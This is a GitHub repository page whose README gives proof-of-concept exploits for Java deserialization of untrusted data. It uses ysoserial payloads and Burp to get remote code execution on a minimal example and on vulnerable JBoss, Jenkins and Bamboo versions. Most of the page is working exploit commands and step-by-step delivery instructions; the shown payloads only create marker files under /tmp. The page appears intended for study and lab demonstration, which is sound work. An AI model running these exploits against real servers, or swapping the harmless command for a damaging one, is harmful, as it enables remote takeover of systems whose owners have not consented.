Skip to content

EdoardoVignati/java-deserialization-of-untrusted-data-poc

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

28 Commits

Bamboo

Bamboo

 
 

JBoss

JBoss

 
 

Jenkins

Jenkins

 
 

MinimalExample

MinimalExample

 
 

Ysoserial-stacktraces

Ysoserial-stacktraces

 
 

LICENSE.md

LICENSE.md

 
 

README.md

README.md

 
 

ysoserial-master-v0.0.5-gb617b7b-16.jar

ysoserial-master-v0.0.5-gb617b7b-16.jar

 
 

Repository files navigation

Java Deserialization Of Untrusted Data

Here there are practical examples of the - deserialization of untrusted data - vulnerability.

These pocs use the ysoserial tool to generate exploits.

Buy Me A Coffee

Pocs

Minimal Example

  • Use OpenJDK 1.8
cd MinimalExample
java -jar ../ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections6 "/tmp/exploit.sh">payload.ser 
cp ./exploit.sh /tmp
chmod +x /tmp/exploit.sh
javac Employee.java
javac DeSerializingObject.java
java -classpath .:apache-collections-commons-collections-3.1.jar DeSerializingObject
  • You will find a file "pwned" in /tmp. This means that the attack has been completed correctly with a RCE.

JBOSS (CVE-2016-7065)

  • Use OpenJDK 1.8
  • Download a vulnerable version of Jboss (in this case you can find the v5.1.0)
  • Run jboss: java -jar ./JBoss/jboss-5.1.0.GA/bin/run.jar
  • Download and open Burp: setup your proxy on localhost:9090
  • In your browser start proxy on localhost:9090
  • Generate the payload with ysoserial: java -jar ysoserial.jar CommonsCollections5 "touch /tmp/JbossVulnerable.txt" > JbossPayload.ser or use the payload inside the folder JBoss
  • Open localhost:8080/invoker/JMXInvokerServlet
  • In Burp "paste from file" and choose JbossPayload.ser
  • Checkout in /tmp folder the execution of "touch /tmp/JbossVulnerable.txt"

https://www.vulmon.com/vulnerabilitydetails?qid=CVE-2016-7065&scoretype=cvssv2

Jenkins (CVE-2015-8103)

  • Use OpenJDK 1.8
  • Download a vulnerable version of Jenkins (in this case you can find the v1.649)
java -jar ./jenkins-war-1.649.war
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.JenkinsListener http://localhost:8080 CommonsCollections5 "touch /tmp/JenkinsVulnerable.txt"

https://www.vulmon.com/vulnerabilitydetails?qid=CVE-2015-8103&scoretype=cvssv2

Bamboo (CVE-2015-6576)

  • Use openJDK 1.7
  • Download and install vulnerable version of Bamboo (v5.4.3 in this case)
  • Create folder /home/user/bamboohome/
  • Add/update the property /Bamboo/atlassian-bamboo-5.4.3/atlassian-bamboo/WEB-INF/classes/bamboo-init.properties with bamboo.home=/home/user/bamboohome
  • Get fingerprint -> localhost:8085/agentServer/GetFingerprint.action?agentType=elastic
  • Generate payload with ysoserial
  • Open localhost:8085/agentServer/message?fingerprint and "copy from file" in burp java -jar ysoserial.jar CommonsCollections4 "touch /tmp/BambooVulnerable.txt" > BambooPayload.ser or use the payload inside the folder JBoss

https://www.vulmon.com/vulnerabilitydetails?qid=CVE-2015-6576&scoretype=cvssv2

Ysoserial stacktraces

Find them in the /Ysoserial-stacktraces directory

References and readings

Defenses

About

Some PoC (Proof-of-Concept) about vulnerability of java deserialization of untrusted data

Topics

java jenkins proof-of-concept bamboo deserialization poc jboss vulnerability security-vulnerability ysoserial

Resources

Readme

License

View license
Activity

Stars

27 stars

Watchers

3 watching

Forks

5 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages